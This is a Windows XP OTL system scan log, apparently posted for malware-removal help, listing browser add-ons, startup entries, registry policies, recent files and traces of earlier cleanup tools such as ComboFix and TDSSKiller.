FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@movenetworks.com/Quantum Media Player:  File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@movenetworks.com/Quantum Media Player:  File not found
FF - HKCU\Software\MozillaPlugins\@nsroblox.roblox.com/launcher: C:\Documents and Settings\Jay\Local Settings\Application Data\RobloxVersions\version-759151294bb84441\\NPRobloxProxy.dll ()
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\smartwebprinting@hp.com: C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2011/09/19 21:23:54 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\wrc@avast.com: C:\Program Files\AVAST Software\Avast\WebRep\FF [2013/06/11 10:12:39 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 31.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2014/08/10 15:54:56 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 31.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2014/08/17 08:30:49 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\smartwebprinting@hp.com: C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2011/09/19 21:23:54 | 000,000,000 | ---D | M]
 
[2008/12/09 18:30:22 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Jay\Application Data\Mozilla\Extensions
[2014/08/23 18:32:16 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\extensions
[2009/04/04 11:00:10 | 000,000,000 | ---D | M] (Move Media Player) -- C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\extensions\moveplayer@movenetworks.com
[2012/02/14 17:59:56 | 000,020,591 | ---- | M] () (No name found) -- C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi
[2014/08/10 14:28:49 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2014/08/10 14:28:50 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}
[2014/08/10 14:28:45 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\browser\extensions
[2014/08/10 14:30:20 | 000,000,000 | ---D | M] (Default) -- C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2013/06/11 10:12:39 | 000,000,000 | ---D | M] (avast! Online Security) -- C:\PROGRAM FILES\AVAST SOFTWARE\AVAST\WEBREP\FF
 
========== Chrome  ==========
 
CHR - default_search_provider:  (Enabled)
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url =
CHR - homepage: http://www.google.com/
CHR - plugin: Error reading preferences file
CHR - Extension: Google Drive = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_1\
CHR - Extension: Google Voice Search Hotword (Beta) = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\
CHR - Extension: YouTube = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_1\
CHR - Extension: Google Search = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_1\
CHR - Extension: Google Wallet = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_2\
 
O1 HOSTS File: ([2014/08/23 18:32:29 | 000,000,027 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O2 - BHO: (Bing Bar Helper) - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files\Microsoft\BingBar\7.1.361.0\BingExt.dll (Microsoft Corporation.)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3 - HKLM\..\Toolbar: (Acer eDataSecurity Management) - {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - C:\WINDOWS\system32\eDStoolbar.dll (HiTRUST)
O3 - HKLM\..\Toolbar: (Bing Bar) - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\Microsoft\BingBar\7.1.361.0\BingExt.dll (Microsoft Corporation.)
O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKCU\..\Toolbar\ShellBrowser: (Acer eDataSecurity Management) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - C:\WINDOWS\system32\eDStoolbar.dll (HiTRUST)
O4 - HKLM..\Run: [AmazonGSDownloaderTray] C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderTray.exe (Amazon.com)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [avast] C:\Program Files\AVAST Software\Avast\avastUI.exe (AVAST Software)
O4 - HKLM..\Run: [eDataSecurity Loader] C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe (HiTRUST)
O4 - HKLM..\Run: [eRecoveryService] C:\Acer\Empowering Technology\eRecovery\eRAgent.exe (Acer Inc.)
O4 - HKLM..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\imekrmig.exe (Microsoft Corporation)
O4 - HKLM..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [LaunchApp] C:\WINDOWS\Alaunch.exe (Acer Inc.)
O4 - HKLM..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\iexplore.exe" /runcleanupscript File not found
O4 - HKLM..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe ()
O4 - HKLM..\Run: [ntiMUI] c:\Program Files\NewTech Infosystems\NTI CD & DVD-Maker 7\ntiMUI.exe ()
O4 - HKLM..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [QuickCare2.2] C:\Program Files\Qwest\QuickCare\bin\sprtcmd.exe ()
O4 - HKCU..\Run: [Spotify Web Helper] C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe (Spotify Ltd)
O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe ()
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Acer WLAN 11g USB Dongle.lnk = C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe (X-Micro Technology Corp.)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE (WinZip Computing, S.L.)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O15 - HKCU\..Trusted Domains: intuit.com ([ttlc] https in Trusted sites)
O16 - DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} http://pcpitstop.com/pcpitstop/PCPitStop.CAB (PCPitstop Utility)
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab (Reg Error: Key error.)
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} http://gfx1.mail.live.com/mail/w1/resources/MSNPUpld.cab (MSN Photo Upload Tool)
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab (OnlineScanner Control)
O16 - DPF: {CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 69.144.127.53 68.116.46.115 71.9.127.107
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{CFC10892-8484-42F4-A98A-DAFA48F3A805}: DhcpNameServer = 69.144.127.53 68.116.46.115 71.9.127.107
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\!SASWinLogon: DllName - (C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL) - C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL (SUPERAntiSpyware.com)
O24 - Desktop WallPaper: C:\Documents and Settings\Jay\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Jay\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O28 - HKLM ShellExecuteHooks: {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL (SuperAdBlocker.com)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006/07/19 20:08:24 | 000,000,050 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O36 - AppCertDlls: x64 - (c:\program files\settings manager\smdmf\x64\sysapcrt.dll) -  File not found
O36 - AppCertDlls: x86 - (c:\program files\settings manager\smdmf\sysapcrt.dll) -  File not found
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
NetSvcs: 6to4 -  File not found
NetSvcs: Ias -  File not found
NetSvcs: Iprip -  File not found
NetSvcs: Irmon -  File not found
NetSvcs: NWCWorkstation -  File not found
NetSvcs: Nwsapagent -  File not found
NetSvcs: WmdmPmSp -  File not found
 
 
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/08/29 21:07:11 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\Jay\Desktop\OTL.scr
[2014/08/29 18:04:00 | 002,347,384 | ---- | C] (ESET) -- C:\Documents and Settings\Jay\Desktop\esetsmartinstaller_enu.exe
[2014/08/29 15:24:50 | 000,000,000 | ---D | C] -- C:\Program Files\ESET
[2014/08/24 11:36:14 | 000,000,000 | -HSD | C] -- C:\Config.Msi
[2014/08/24 11:34:03 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\DESIGNER
[2014/08/23 09:50:44 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\MRT
[2014/08/21 21:35:16 | 000,000,000 | ---D | C] -- C:\FRST
[2014/08/18 22:58:03 | 000,000,000 | ---D | C] -- C:\4ea9f4d50c4d13298e29e45991c07f
[2014/08/17 12:00:58 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\xp_eos.exe
[2014/08/17 12:00:58 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\xp_eos.exe
[2014/08/10 19:57:15 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Jay\AppData
[2014/08/10 19:45:46 | 000,000,000 | -HSD | C] -- C:\RECYCLER
[2014/08/10 19:02:54 | 000,518,144 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWREG.exe
[2014/08/10 19:02:54 | 000,406,528 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWSC.exe
[2014/08/10 19:02:54 | 000,212,480 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWXCACLS.exe
[2014/08/10 19:02:54 | 000,060,416 | ---- | C] (NirSoft) -- C:\WINDOWS\NIRCMD.exe
[2014/08/10 19:02:34 | 000,000,000 | ---D | C] -- C:\Qoobox
[2014/08/10 18:58:16 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Jay\Application Data\FirefoxToolbar
[2014/08/10 14:35:49 | 000,536,576 | ---- | C] (SQLite Development Team) -- C:\WINDOWS\System32\sqlite3.dll
[2014/08/10 14:32:56 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/08/10 14:28:44 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/08/29 21:11:23 | 000,000,880 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2014/08/29 21:06:42 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Jay\Desktop\OTL.scr
[2014/08/29 21:01:00 | 000,000,830 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2014/08/29 18:11:04 | 000,000,876 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2014/08/29 18:04:06 | 002,347,384 | ---- | M] (ESET) -- C:\Documents and Settings\Jay\Desktop\esetsmartinstaller_enu.exe
[2014/08/29 17:49:26 | 000,000,364 | -H-- | M] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2014/08/29 17:49:19 | 000,001,158 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2014/08/29 17:48:59 | 000,000,218 | ---- | M] () -- C:\WINDOWS\tasks\Microsoft Windows XP End of Service Notification Logon.job
[2014/08/29 17:48:51 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2014/08/29 17:48:50 | 1063,768,064 | -HS- | M] () -- C:\hiberfil.sys
[2014/08/23 18:38:52 | 000,000,212 | ---- | M] () -- C:\WINDOWS\tasks\Microsoft Windows XP End of Service Notification Monthly.job
[2014/08/23 18:32:29 | 000,000,027 | ---- | M] () -- C:\WINDOWS\System32\drivers\etc\hosts
[2014/08/23 17:46:21 | 000,347,400 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2014/08/23 10:21:29 | 000,688,058 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2014/08/23 10:21:29 | 000,163,952 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2014/08/23 10:15:13 | 000,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
[2014/08/10 20:57:30 | 000,002,503 | ---- | M] () -- C:\Documents and Settings\Jay\Desktop\Launch Google Earth.lnk
[2014/08/10 19:33:29 | 000,000,027 | ---- | M] () -- C:\WINDOWS\System32\drivers\etc\hosts.20140818-224430.backup
[2014/08/10 14:31:30 | 001,366,203 | ---- | M] () -- C:\Documents and Settings\Jay\Desktop\AdwCleaner.exe
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/08/23 17:51:13 | 000,000,218 | ---- | C] () -- C:\WINDOWS\tasks\Microsoft Windows XP End of Service Notification Logon.job
[2014/08/23 17:51:12 | 000,000,212 | ---- | C] () -- C:\WINDOWS\tasks\Microsoft Windows XP End of Service Notification Monthly.job
[2014/08/14 23:20:46 | 1063,768,064 | -HS- | C] () -- C:\hiberfil.sys
[2014/08/10 19:02:54 | 000,256,000 | ---- | C] () -- C:\WINDOWS\PEV.exe
[2014/08/10 19:02:54 | 000,208,896 | ---- | C] () -- C:\WINDOWS\MBR.exe
[2014/08/10 19:02:54 | 000,098,816 | ---- | C] () -- C:\WINDOWS\sed.exe
[2014/08/10 19:02:54 | 000,080,412 | ---- | C] () -- C:\WINDOWS\grep.exe
[2014/08/10 19:02:54 | 000,068,096 | ---- | C] () -- C:\WINDOWS\zip.exe
[2014/08/10 14:31:25 | 001,366,203 | ---- | C] () -- C:\Documents and Settings\Jay\Desktop\AdwCleaner.exe
[2013/10/20 21:33:54 | 000,001,972 | ---- | C] () -- C:\WINDOWS\wininit.ini
[2013/09/11 18:57:45 | 000,000,190 | ---- | C] () -- C:\Documents and Settings\Jay\Local Settings\Application Data\rbxcsettings.rbx
[2013/06/30 18:36:49 | 000,000,175 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswVmm.sys.sum
[2013/06/30 18:36:49 | 000,000,175 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswSP.sys.sum
[2013/06/30 18:36:49 | 000,000,175 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswSnx.sys.sum
[2013/03/21 01:25:07 | 000,175,176 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswVmm.sys
[2013/03/21 01:25:04 | 000,049,376 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswRvrt.sys
[2012/03/30 17:49:57 | 001,982,108 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\WPFFontCache_v0400-S-1-5-21-943902637-2227688448-3181155623-1005-0.dat
[2012/03/30 17:49:55 | 000,329,346 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\WPFFontCache_v0400-System.dat
[2012/03/30 16:35:54 | 000,000,590 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\Microsoft.SqlServer.Compact.400.32.bc
[2008/11/15 13:48:49 | 000,000,056 | ---- | C] () -- C:\Documents and Settings\Jay\Local Settings\Application Data\84756-11986-27475-00TC1-94865
[2007/04/28 03:44:36 | 000,007,168 | ---- | C] () -- C:\Documents and Settings\Jay\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2007/04/18 17:15:12 | 000,000,126 | ---- | C] () -- C:\Documents and Settings\Jay\Local Settings\Application Data\fusioncache.dat
 
========== ZeroAccess Check ==========
 
[2006/07/19 20:06:02 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shdocvw.dll -- [2008/04/13 18:12:05 | 001,499,136 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009/02/09 06:10:48 | 000,473,600 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2008/04/13 18:12:08 | 000,273,920 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
========== LOP Check ==========
 
[2012/10/18 18:03:55 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\188F1432-103A-4ffb-80F1-36B633C5C9E1
[2009/04/25 16:23:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Amazon
[2011/09/05 22:24:31 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\AVAST Software
[2007/11/04 21:13:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Avocent AdminWorks
[2013/08/25 10:35:43 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Cisco Systems
[2011/09/02 17:31:50 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\Common Files
[2010/10/13 22:54:39 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\F-Secure
[2011/09/02 17:24:14 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\MFAData
[2009/08/06 21:23:14 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\WinZip
[2011/01/16 12:37:39 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{429CAD59-35B1-4DBC-BB6D-1DB246563521}
[2009/09/19 23:27:21 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
[2011/06/18 16:45:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\.minecraft
[2007/11/04 21:13:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Avocent AdminWorks
[2012/10/16 01:38:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Azureus
[2007/07/23 21:37:11 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Canon
[2014/04/19 21:59:36 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\com.pandora.desktop
[2013/02/07 17:54:12 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\com.pandora.desktop.E7C14276FFE9EEF0BC7DCE654C467D9A299EFD21.1
[2010/09/19 11:10:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\com.pandora.desktop.FB9956FD96E03239939108614098AD95535EE674.1
[2008/10/30 22:05:21 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\FileZilla
[2014/08/10 18:58:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\FirefoxToolbar
[2011/11/18 23:26:38 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Rovio
[2012/07/18 20:19:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\spiral
[2013/02/25 23:08:01 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Spotify
[2012/01/08 20:52:41 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Unity
 
========== Purity Check ==========
 
 
 
========== Custom Scans ==========
 
< %SYSTEMDRIVE%\*.* >
[2012/10/05 19:57:22 | 000,000,000 | ---- | M] () -- C:\1Clickfoldertest.txt
[2006/07/19 20:08:24 | 000,000,050 | ---- | M] () -- C:\AUTOEXEC.BAT
[2007/04/18 17:04:51 | 000,000,211 | ---- | M] () -- C:\Boot.bak
[2013/10/20 20:29:35 | 000,000,361 | RHS- | M] () -- C:\boot.ini
[2011/09/02 18:10:37 | 000,005,098 | ---- | M] () -- C:\CD3rdPartyWrapper.log
[2004/08/03 23:00:00 | 000,260,272 | RHS- | M] () -- C:\cmldr
[2014/08/10 19:41:00 | 000,023,603 | ---- | M] () -- C:\ComboFix.txt
[2012/08/24 18:09:34 | 000,005,287 | ---- | M] () -- C:\comcastrelease.log
[2006/07/19 19:43:46 | 000,000,000 | ---- | M] () -- C:\CONFIG.SYS
[2014/08/29 17:48:50 | 1063,768,064 | -HS- | M] () -- C:\hiberfil.sys
[2006/07/19 19:43:46 | 000,000,000 | RHS- | M] () -- C:\IO.SYS
[2014/07/21 20:50:56 | 000,002,245 | ---- | M] () -- C:\logFileUI.txt
[2006/07/19 19:43:46 | 000,000,000 | RHS- | M] () -- C:\MSDOS.SYS
[2004/08/03 23:00:00 | 000,047,564 | RHS- | M] () -- C:\NTDETECT.COM
[2008/10/11 13:14:14 | 000,250,048 | RHS- | M] () -- C:\ntldr
[2014/08/29 17:48:49 | 1598,029,824 | -HS- | M] () -- C:\pagefile.sys
[2006/07/19 20:12:36 | 000,000,076 | RHS- | M] () -- C:\Preload.aaa
[2006/07/19 20:02:26 | 000,000,499 | ---- | M] () -- C:\RHDSetup.log
[2014/08/10 13:38:29 | 000,000,458 | ---- | M] () -- C:\rkill.log
[2010/01/29 13:09:46 | 000,003,630 | ---- | M] () -- C:\scramble.log
[2011/09/02 21:47:14 | 000,039,512 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_02.09.2011_21.46.01_log.txt
[2011/09/03 22:51:48 | 000,037,494 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_03.09.2011_22.51.21_log.txt
[2011/09/03 22:52:51 | 000,037,494 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_03.09.2011_22.52.06_log.txt
[2014/05/08 19:05:46 | 000,000,414 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_08.05.2014_19.05.43_log.txt
[2014/08/10 18:54:09 | 000,041,158 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_10.08.2014_18.53.24_log.txt
[2012/10/16 01:48:18 | 000,041,358 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_16.10.2012_01.46.36_log.txt
[2012/10/16 02:23:50 | 000,000,414 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_16.10.2012_02.23.45_log.txt
[2014/08/18 22:32:36 | 000,000,414 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_18.08.2014_22.32.31_log.txt
[2013/10/20 19:39:43 | 000,080,378 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_20.10.2013_19.37.25_log.txt
[2014/07/21 21:12:22 | 000,041,510 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_21.07.2014_21.10.48_log.txt
[2014/07/22 19:44:53 | 000,000,414 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_22.07.2014_19.44.51_log.txt
[2014/07/25 21:28:39 | 000,041,510 | ---- | M] () -- C:\TDSSKiller.2.5.17.0_25.07.2014_21.26.15_log.txt
